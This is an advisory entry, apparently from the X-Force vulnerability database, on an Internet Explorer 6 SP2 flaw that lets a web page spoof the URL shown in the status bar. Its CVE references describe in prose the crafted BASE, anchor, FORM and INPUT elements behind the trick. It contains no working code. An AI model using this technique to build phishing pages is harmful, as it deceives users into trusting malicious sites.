Microsoft Internet Explorer A HREF status bar spoofing
| ie-ahref-status-spoofing (17938) |  Medium Risk |
Description:
Microsoft Internet Explorer could allow a remote attacker to spoof a trusted Web page by altering the URL that is displayed in the Internet Explorer status bar. A remote attacker could create a specially-crafted URL link containing malformed A HREF tags, which will cause the spoofed URL to be displayed in the status bar, once the link is clicked. An attacker could exploit this vulnerability by creating a malicious Web page and hosting it on a Web site or by sending it to a victim as an HTML email.
Platforms Affected:
- Microsoft, Internet Explorer 6 SP2
Remedy:
No remedy available as of July 4, 2009.
Consequences:
Other
References:
- BugTraq Mailing List, Sat Oct 30 2004 - 13:16:07 CDT, Re: New URL spoofing bug in Microsoft Internet Explorer at http://archives.neohapsis.com/archives/bugtraq/2004-10/0356.html.
- BID-11565: Microsoft Internet Explorer HTML Form Tags URI Obfuscation Weakness
- CVE-2004-1104: Microsoft Internet Explorer 6.0 SP2 allows remote attackers to spoof a legitimate URL in the status bar and conduct a phishing attack via a web page that contains a BASE element that points to the legitimate site, followed by an anchor (a) element with an empty href attribute, and a FORM whose action points to a malicious URL, and an INPUT submit element that is modified to look like a legitimate URL.
- CVE-2006-0799: Microsoft Internet Explorer allows remote attackers to spoof a legitimate URL in the status bar and conduct a phishing attack via a web page with an anchor element with a legitimate href attribute, a form whose action points to a malicious URL, and an INPUT submit element that is modified to look like a legitimate URL. NOTE: this issue is very similar to CVE-2004-1104, although the manipulations are slightly different.
- OSVDB ID: 23609: Microsoft IE Crafted Elements Status Bar URL Spoofing
- SA11273: Internet Explorer/Outlook Express Restricted Zone Status Bar Spoofing
- US-CERT VU#702086: Multiple web browsers do not properly interpret BASE and FORM elements when displaying URLs in the status bar
Reported:
Oct 30, 2004
The information within this database may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (IBM Internet Security Systems X-Force) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.
For corrections or additions please email xforce@iss.net